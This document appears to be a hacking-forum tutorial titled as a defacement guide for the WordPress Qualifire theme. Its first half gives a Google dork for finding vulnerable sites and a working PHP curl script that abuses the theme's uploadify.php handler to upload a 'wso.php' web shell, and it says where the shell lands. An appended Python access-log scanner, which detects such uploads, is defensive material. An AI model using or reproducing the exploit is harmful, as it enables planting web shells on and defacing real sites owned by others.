Deface with the WordPress Qualifire Theme | File Upload Vulnerability

Dork :
- inurl:wp-content/themes/qualifire

exploit:
http://site.com/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php


Save this with a (.php) extension,
for example: aplod.php


$uploadfile="wso.php";
$ch = curl_init("http://site.com/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('orange_themes'=>"@$uploadfile", 'folder'=>'/wp-content/themes/qualifire/scripts/admin/uploadify/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?> 

Notes:
wso.php = the shell we want to upload :D
http://site.com/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php = your target :v

Save:
  • aplod.php
  • wso.php

    in xampp/php

    After that, open it with CMD. :v
    I haven't gotten one yet either.. but just sharing anyway :v
Shell location ==>> wp-content/themes/qualifire/scripts/admin/uploadify
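
For site owners running this theme, the request pattern described above shows up in the web server access log as a POST to uploadify.php followed by a request for a script served from the same directory. The Python below is an added example, not part of the original post; it assumes Combined Log Format, and the sample log lines (IPs, timestamps, file names) are constructed.

```python
import re
from urllib.parse import unquote

# Upload handler path and directory named on this page.
UPLOAD_DIR = "/wp-content/themes/qualifire/scripts/admin/uploadify/"
HANDLER = UPLOAD_DIR + "uploadify.php"

# Combined Log Format: ip - - [time] "METHOD path HTTP/x" status size ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
SCRIPT_RE = re.compile(r"\.(php\d?|phtml|phar)$")

def scan(lines):
    """Return findings as (kind, ip, timestamp, path) tuples."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a parseable access-log line
        # Drop the query string and decode %xx so encoded paths still match.
        path = unquote(m["path"].split("?", 1)[0])
        lower = path.lower()
        if not lower.startswith(UPLOAD_DIR):
            continue
        if lower == HANDLER:
            # Any POST to the upload handler is worth reviewing.
            if m["method"] == "POST":
                findings.append(("upload-attempt", m["ip"], m["ts"], path))
        elif SCRIPT_RE.search(lower) and m["status"] == "200":
            # A script other than the handler was served from the upload directory.
            findings.append(("script-served", m["ip"], m["ts"], path))
    return findings

# Constructed sample log lines (documentation-range IPs, made-up file names).
SAMPLE_LOG = [
    '198.51.100.7 - - [12/Mar/2014:10:01:02 +0000] "GET /wp-content/themes/qualifire/style.css HTTP/1.1" 200 5120',
    '203.0.113.9 - - [12/Mar/2014:10:05:40 +0000] "POST /wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php HTTP/1.1" 200 12',
    '203.0.113.9 - - [12/Mar/2014:10:05:55 +0000] "GET /wp-content/themes/qualifire/scripts/admin/uploadify/example.php?x=1 HTTP/1.1" 200 8040',
    '198.51.100.7 - - [12/Mar/2014:10:09:00 +0000] "GET /wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.css HTTP/1.1" 200 900',
    '203.0.113.20 - - [12/Mar/2014:10:11:00 +0000] "GET /wp-content/themes/qualifire/scripts/admin/uploadify/missing.php HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding, sep="\t")
```

A "script-served" finding means the upload directory should be inspected on disk and the upload handler removed or blocked at the web server.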